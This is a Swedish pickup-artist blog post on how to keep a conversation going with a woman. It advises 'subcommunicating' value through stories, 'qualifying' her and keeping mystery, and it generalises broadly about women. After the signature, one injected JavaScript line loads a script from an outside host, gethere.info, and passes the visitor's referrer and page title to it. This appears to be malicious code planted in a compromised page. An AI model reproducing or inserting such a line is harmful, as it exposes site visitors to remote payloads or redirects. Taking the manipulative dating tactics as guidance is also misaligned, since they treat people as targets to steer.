32010732 05bfe8eba7 Vad ska jag prata om…?

Hej.

Denna bloggpost kommer att handla om hur du håller en konversation vid liv samt vikten av subkommunikation. Har du någonsin känt att du inte vet vad du ska säga? Om du någonsin upplevt det så är denna post riktad till dig. Jag kommer att ge exempel på vad du kan säga men även förklara begreppet subkummunikation. Inom vår värld kallas detta för att demonstrera högre värde, vilket innebär att det som subkommuniceras är mycket viktare än det du säger. Låt oss reda ut detta…

Innan du börjar fundera på vad det det är du vill säga så vill jag att du funderar riktigt noga på vad är det du vill ha sagt i din berättelse. Anledningen till att ska subkommunicera det istället för att säga det rakt ut är att om du säger häftiga saker om dig själv rakt ut så kommer det att uppfattas som skryt. Mina vänner, skryt är något som lätt händer, jag har själv slängt ur mig en och annan groda här och där. Det kommer inte från en källa av ondska, det är snarare ett tecken på godhet som landar fel, i brist på att säga saker helt enkelt, och vi har alla gjort det vid något tillfälle.

Anledningen till att skryt crashlandar hos tjejer är att det är ett lågvärdesbeteende . Anledningen till att det uppfattas som lågvärde är att i din subkommunikation så skriker du. ”Jag duger inte för den jag är”, eller ”Jag måste ha materiella saker för att du ska gilla mig” Med andra ord så sätter du tjejen på en piedestal vilket innebär att du ligger redan i underläge innan du ens börjat fördjupa din relation till henne. Tjejer är enormt mycket bättre än killar på att ta upp subtila signaler. Skryter du så sjunker ditt värde i hennes ögon.

Målet med det du säger är att förmedla din identitet. Du vill få henne att börja tänka på dig. Lyckas du med att hamna i hennes tankar så har du kommit långt på vägen.

Okej är du med mig så här långt ? Låt oss gå vidare

Säg att du vill subkommunicera att du är äventyrlig och du gillar utmaningar…. Låt oss anta att du varit med om något häftigt, till exempel att du har rest mycket. Börjar du din kommunikation med att säga att du vart här och där så är du stekt! Nyckeln är att tona ner det och låta henne dra ut det ur dig.

Det kan gå till såhär. Hitta först en brygga som kan leda in dig på det du vill säga. Till exempel: ”Vet vad jag gillar med sommaren och när det är riktigt varmt ute? Det påminner mig om när…”

Det påminner mig om en kväll när vi beställde mat i en liten by son hette XXX. Det var en liten sunkig restaurang mitt i ingenstans med de serverade de godaste köttbullarna jag någonsin ätit. Det var en äldre dam där som tog emot oss tillsammans med hennes familj, väldigt väldigt enkla människor och väldigt väldigt varma personer. De var inte vanliga köttbullar de servera oss det var något inhemsk, starka köttbullar men de smakade grymt gott. Du vet sådär när man inte kan sätta fingret på…. fuck nu när jag tänker på det så undrar jag om det var något lokalt djur eller något…

Så här långt så kommer hon vara nyfiken på var du varit och kommer säkert fråga. Men fortsätt din berättelse.

Vet du vad jag uppskattar när jag besöker främmande kulturer… Känslan att komma bort och börja upptäcka saker på nytt, såsom vad som är ätbart eller känslan av upprymhet av något ställe som du inte är säker på ifall det är farligt eller inte. På något sätt får det mig att min se min vardag med andra ögon.

Så här långt kommer hon fråga dig om du rest mycket eller något liknade. Här kan du skoja med henne typ.. Jo jag har vart i Göteborg någon gång.. (Med glimten i ögat) Sedan kan du fråga henne om hon är äventyrlig. Detta kallas för att kvalificiera henne (Men det är en bloggpost i sig)

Okej så har du kommit så här långt så har hon garanterat börjat fantisera upp en bild av din identitet. I denna ex så har du subkommunicerat bilden av ”Äventyraren”

Fortsätt med nästa berättelse, det är av vikt att du visar din mångsidighet. Att vara enformig uppfattas som en ”Tråkig” eller neutrala känslor. Glöm inte bort att ”Attraktiv” är den som är källan till positiva känslor hos andra.

Tjejer är generellt dåliga på att ”ragga”. Så här långt kommer hon börja ställa intervjufrågor bara för att hålla konversationen vid liv och visa att hon är intresserad. Det absolut bästa tecknet på att hon är intresserad är att hon börjar hålla med om allt du säger eller påvisa att ni delar intressen. Svara på några av hennes frågor, men inte alla, utan håll mystiken vid liv genom att berätta om något annat du upplevt utifrån hennes frågor. Till exempel, om hon frågar dig vad du jobbar med, kan du svara med något i den här stilen:

-”Jag jobbar som x men jag kom att tänka på hur i våras när jag cyklade till jobbet…” osv och så går du in på nästa berättelse.

Några generella tips:

Håll dig till sanna berättelser, prata om saker som hänt i ditt liv. du kan prata om de enklaste sakerna förutsatt att du är målande och beskriver det du kände. En bra tumregel är, om du upplever känslan av vad du berättar så kommer hon garanterat känna likadant. Allt du säger kommer att förknippas med din identitet så undvik tunga ämnen. Människor börja tycka om varandra i fantasin. Ser hon dig i hennes fantasier och upplever en behaglig känsla så har du lyckats.

Många Kramar/Gustavo

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;